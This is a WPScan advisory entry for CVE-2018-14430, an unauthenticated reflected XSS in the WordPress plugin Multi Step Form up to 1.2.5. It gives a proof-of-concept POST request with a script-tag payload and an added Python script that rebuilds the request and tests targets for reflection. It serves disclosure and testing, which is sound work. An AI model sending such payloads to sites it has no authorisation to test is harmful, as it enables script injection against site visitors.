Multi Step Form <= 1.2.5 - Multiple Unauthenticated Reflected XSS



Description
The WordPress plugin Multi Step Form, in versions up to and including 1.2.5, reflects several request parameters into its admin-ajax.php response without escaping them, allowing remote attackers to execute arbitrary JavaScript in a victim's browser through Reflected XSS.

The vulnerable endpoint does not require a logged-in user, so the issue can be exploited by unauthenticated attackers. Because the payload travels in a POST request, delivery works the same way as CSRF: the attacker induces the victim's browser to submit a crafted form to the target site.
Proof of Concept
The following parameters are vulnerable in the fw_send_data function, reached through the fw_send_email admin-ajax action shown in the request below (id is the form identifier, set to Test in the PoC):
fw_data[id][1]
fw_data[id][2]
fw_data[id][3]
fw_data[id][4]
email

Proof of Concept (PoC):
Sending the following POST request makes the server reflect the injected script in its response; when that response is rendered in a browser an alert is displayed. The payload sits in the first fw_data field (URL-encoded <script>alert(1)</script>). The nonce value shown was issued by the submitter's test installation and has to be replaced with one obtained from the target site.

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/2018/07/10/hola-mundo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 207
Cookie: wp-settings-time-1=1531401661
Connection: close

action=fw_send_email&id=1&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&fw_data%5BTest%5D%5B1%5D%5B%5D=2&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20&email=3%403.com&nonce=ba16aeb8b0
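The script below is an added example and is not part of the WPScan entry or of the plugin. It URL-decodes the PoC body above so the PHP-style array keys and the raw payload are readable, rebuilds the same request for another form id and nonce (both assumptions that must be taken from the target), and classifies a response as vulnerable (payload reflected verbatim), escaped (only an entity-encoded copy present, the expected behaviour of a fixed site) or not reflected. The sample responses in the main block are constructed, not captured from a real site.

```python
# Added example (not from the WPScan entry or the plugin): decode the advisory's
# PoC body, rebuild it for another target, and classify whether admin-ajax.php
# reflects the payload unescaped. The form id, nonce and the sample responses
# below are assumptions / constructed inputs.
import html
import urllib.parse
import urllib.request

# The advisory's request body, copied from the PoC above.
POC_BODY = (
    "action=fw_send_email&id=1"
    "&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E"
    "&fw_data%5BTest%5D%5B1%5D%5B%5D=2"
    "&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com"
    "&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20"
    "&email=3%403.com&nonce=ba16aeb8b0"
)

PAYLOAD = "<script>alert(1)</script>"


def parse_poc_body(body: str) -> dict:
    """URL-decode a form body into {name: [values]} so the PHP-style array
    keys (fw_data[Test][0][]) and the raw payload become readable."""
    return urllib.parse.parse_qs(body, keep_blank_values=True)


def build_body(form_id: str, nonce: str, payload: str = PAYLOAD,
               email: str = "test@example.com") -> str:
    """Rebuild the PoC body for a given form id and nonce. The field layout
    mirrors the PoC: the payload goes into the first fw_data slot."""
    fields = [
        ("action", "fw_send_email"),
        ("id", "1"),
        (f"fw_data[{form_id}][0][]", payload),
        (f"fw_data[{form_id}][1][]", "2"),
        (f"fw_data[{form_id}][2][]", email),
        (f"fw_data[{form_id}][3][]", "2018-07-20"),
        ("email", email),
        ("nonce", nonce),
    ]
    return urllib.parse.urlencode(fields)


def classify_response(body: str, payload: str = PAYLOAD) -> str:
    """'vulnerable' if the payload comes back byte-for-byte (it executes when
    rendered), 'escaped' if only an HTML-entity-encoded copy appears (what a
    fixed site should return), otherwise 'not-reflected'."""
    if payload in body:
        return "vulnerable"
    if html.escape(payload, quote=False) in body:
        return "escaped"
    return "not-reflected"


def check_target(base_url: str, form_id: str, nonce: str,
                 timeout: float = 10.0) -> str:
    """Send the rebuilt request to <base_url>/wp-admin/admin-ajax.php and
    classify the reply. This performs a network request; run it only against
    hosts you are authorised to test."""
    url = base_url.rstrip("/") + "/wp-admin/admin-ajax.php"
    data = build_body(form_id, nonce).encode()
    req = urllib.request.Request(
        url, data=data, method="POST",
        headers={
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
        },
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return classify_response(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    for name, values in parse_poc_body(POC_BODY).items():
        print(f"{name} = {values}")
    # Constructed sample replies standing in for a vulnerable and a fixed site.
    print(classify_response("Error: " + PAYLOAD + " is not a valid name"))
    print(classify_response("Error: " + html.escape(PAYLOAD) + " is not a valid name"))
```

The classifier deliberately looks for the exact payload string rather than any <script> tag, so legitimate scripts in the response do not produce a false positive; a site that returns the entity-encoded form is treated as fixed, which matches the change in the linked changeset only to the extent that the payload no longer comes back verbatim.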

Affects Plugin

Fixed in version 1.2.6

References

CVE 2018-14430
URL https://hackpuntes.com/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/
URL https://plugins.trac.wordpress.org/changeset/1917500/multi-step-form

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Javier Olmedo
Submitter Website https://hackpuntes.com
Submitter Twitter JJavierOlmedo
Views 1705
Verified Yes
WPVDB ID 9106

Timeline

Publicly Published 2018-07-20
Added 2018-07-30
Last Updated 2018-08-28

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.